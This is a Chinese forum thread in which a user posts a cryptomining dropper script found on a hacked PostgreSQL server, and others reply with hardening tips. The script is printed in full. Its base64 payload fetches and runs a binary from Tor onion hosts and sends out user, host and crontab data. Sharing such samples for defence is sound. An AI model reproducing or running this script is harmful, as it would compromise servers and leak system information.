牛的！挖矿狗在服务器里留下的脚本

联通

1. #!/bin/bash
   
2. exec &>/dev/null
   
3. echo 3xhdWq1UYuV4/3VblDLXYMm6sgpi+MdG8yaUTzuAKbiNjedgHWe37OEDQJveXszF
   
4. echo M3hoZFdxMVVZdVY0LzNWYmxETFhZTW02c2dwaStNZEc4eWFVVHp1QUtiaU5qZWRnSFdlMzdPRURRSnZlWHN6RgpleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZD0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmM9JChlY2hvICJjdXJsIC00ZnNTTGtBLSAtbTIwMCIpCnQ9JChlY2hvICJtaGV2a2s0b2RnenFwdDJoYmozaGh3MnV6NHZodW5vbzU1ZXZld3JnbW91eWllaGNhbHRtYnJxZCIpCgpzb2NreigpIHsKbj0oZG9oLmRlZmF1bHRyb3V0ZXMuZGUgZG5zLmhvc3R1eC5uZXQgdW5jZW5zb3JlZC5sdXgxLmRucy5uaXhuZXQueHl6IGRucy5ydWJ5ZmlzaC5jbiBkbnMudHduaWMudHcgZG9oLmNlbnRyYWxldS5waS1kbnMuY29tIGRvaC5kbnMuc2IgZG9oLWZpLmJsYWhkbnMuY29tIGZpLmRvaC5kbnMuc25vcHl0YS5vcmcgZG5zLmZsYXR1c2xpZmlyLmlzIGRvaC5saSBkbnMuZGlnaXRhbGUtZ2VzZWxsc2NoYWZ0LmNoKQpwPSQoZWNobyAiZG5zLXF1ZXJ5P25hbWU9cmVsYXkudG9yMnNvY2tzLmluIikKcz0kKCRjIGh0dHBzOi8vJHtuWyQoKFJBTkRPTSUxMCkpXX0vJHAgfCBncmVwIC1vRSAiXGIoWzAtOV17MSwzfVwuKXszfVswLTldezEsM31cYiIgfHRyICcgJyAnXG4nfGdyZXAgLUV2IFsuXTB8c29ydCAtdVJ8aGVhZCAtbiAxKQp9CgpmZXhlKCkgewpmb3IgaSBpbiAuICRIT01FIC91c3IvYmluICRkIC92YXIvdG1wIDtkbyBlY2hvIGV4aXQgPiAkaS9pICYmIGNobW9kICt4ICRpL2kgJiYgY2QgJGkgJiYgLi9pICYmIHJtIC1mIGkgJiYgYnJlYWs7ZG9uZQp9Cgp1KCkgewpzb2NregpmPS9pbnQuJCh1bmFtZSAtbSkKeD0uLyQoZGF0ZXxtZDVzdW18Y3V0IC1mMSAtZC0pCnI9JChjdXJsIC00ZnNTTGsgY2hlY2tpcC5hbWF6b25hd3MuY29tfHxjdXJsIC00ZnNTTGsgaXAuc2IpXyQod2hvYW1pKV8kKHVuYW1lIC1tKV8kKHVuYW1lIC1uKV8kKGlwIGF8Z3JlcCAnaW5ldCAnfGF3ayB7J3ByaW50ICQyJ318bWQ1c3VtfGF3ayB7J3ByaW50ICQxJ30pXyQoY3JvbnRhYiAtbHxiYXNlNjQgLXcwKQokYyAteCBzb2NrczVoOi8vJHM6OTA1MCAkdC5vbmlvbiRmIC1vJHggLWUkciB8fCAkYyAkMSRmIC1vJHggLWUkcgpjaG1vZCAreCAkeDskeDtybSAtZiAkeAp9Cgpmb3IgaCBpbiB0b3Iyd2ViLmluIHRvcjJ3ZWIuaXQgb25pb24uZm91bmRhdGlvbiBvbmlvbi5jb20uZGUgb25pb24uc2ggdG9yMndlYi5zdSAKZG8KaWYgISBscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzOyB0aGVuCmZleGU7dSAkdC4kaApscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzIHx8IChjZCAvdG1wO3UgJHQuJGgpCmxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXMgfHwgKGNkIC9kZXYvc2htO3UgJHQuJGgpCmVsc2UKYnJlYWsKZmkKZG9uZQo=|base64 -d|bash

复制代码

给大家感受下而已，作为开发环境开放远程链接的 PostgreSQL 12 数据库，端口5432未修改，远程登陆也配置了密码验证，密码强度也足够，居然还是被黑了……所幸postgres账户没特权，不然就抢救不了了……

吗的上次是redis，这次是postgresql，真是啥都不能开外网

Slime

这个脚本写的太好了，我还是第一次知道tor2socks
https://paste.ubuntu.com/p/XCHdKNGZGt/

wowboy

装zerotier，redis端口只允许指定ip访问。
对外只开放必要端口！！

DMengbi

这些乱码就能挖矿了？机器认识吗？这些代码真的能够把挖矿事情说全让机器知道从哪开始挖，挖好了给谁？

jzl

DMengbi 发表于 2021-1-22 10:31
这些乱码就能挖矿了？机器认识吗？这些代码真的能够把挖矿事情说全让机器知道从哪开始挖，挖好了给谁？ ...

base64 解码

qqlikeho

挖的啥 解码了没看出啥东西来  代码粘不上来

nightmare

我前一段时间es账户用弱密码也被挖了，脚本在不同目录放了好几份

OokoukioO

开放公网改端口

联通

nightmare 发表于 2021-1-22 10:36
我前一段时间es账户用弱密码也被挖了，脚本在不同目录放了好几份

我给的强密码也中招了，这脚本应该只是一部分，还在继续查找

tkk

https://gist.github.com/Ansen/13b0efacc8ed535edb8b486804e5ded4

Nami

肯定是只开放80，443，其他都是内网作业，最前面最好放个Firewall更好